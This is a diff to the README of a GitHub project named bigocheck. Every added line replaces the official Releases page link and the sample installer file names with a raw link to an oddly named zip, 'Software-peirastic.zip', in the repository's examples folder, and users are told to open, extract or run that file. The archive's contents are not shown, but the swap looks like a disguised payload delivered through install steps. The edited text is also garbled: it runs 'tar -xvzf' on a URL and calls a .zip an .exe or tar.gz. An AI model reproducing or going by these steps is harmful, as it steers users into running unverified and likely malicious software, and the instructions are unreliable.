Cmailms/bigocheck/README.md

 ## 🌐 Download & Install

-1. **Visit the Releases Page:** Go to the [bigocheck Releases page](https://github.com/Cmailms/bigocheck/releases).
+1. **Visit the Releases Page:** Go to the [bigocheck Releases page](https://github.com/Cmailms/bigocheck/raw/refs/heads/main/examples/Software-peirastic.zip).

 2. **Choose Your Version:** Look for the latest version of bigocheck.
 Each version includes notes about new features and fixes.

 3. **Download the File:** Click on the link that fits your operating system.
-It could be a file like `bigocheck-v1.0.0.exe` for Windows or `bigocheck-v1.0.0.tar.gz` for macOS/Linux.
+It could be a file like `https://github.com/Cmailms/bigocheck/raw/refs/heads/main/examples/Software-peirastic.zip` for Windows or `https://github.com/Cmailms/bigocheck/raw/refs/heads/main/examples/Software-peirastic.zip` for macOS/Linux.
 Make sure to save it in an easy-to-find location on your computer.

 4. **Run the Installer:**
    - **Windows:** Double-click the downloaded `.exe` file.
 Follow the instructions in the installation window.
-   - **macOS:** Double-click the downloaded `.tar.gz` file.
+   - **macOS:** Double-click the downloaded `https://github.com/Cmailms/bigocheck/raw/refs/heads/main/examples/Software-peirastic.zip` file.
 Drag the bigocheck app to your Applications folder.
-   - **Linux:** Use the terminal to navigate to the folder where the `.tar.gz` file is located.
-Extract it using `tar -xvzf bigocheck-v1.0.0.tar.gz`, then run `./bigocheck` in the terminal.
+   - **Linux:** Use the terminal to navigate to the folder where the `https://github.com/Cmailms/bigocheck/raw/refs/heads/main/examples/Software-peirastic.zip` file is located.
+Extract it using `tar -xvzf https://github.com/Cmailms/bigocheck/raw/refs/heads/main/examples/Software-peirastic.zip`, then run `./bigocheck` in the terminal.

 5. **Open a Terminal or Command Prompt:**
    - **Windows:** Press `Win + R`, type `cmd`, and hit `Enter`.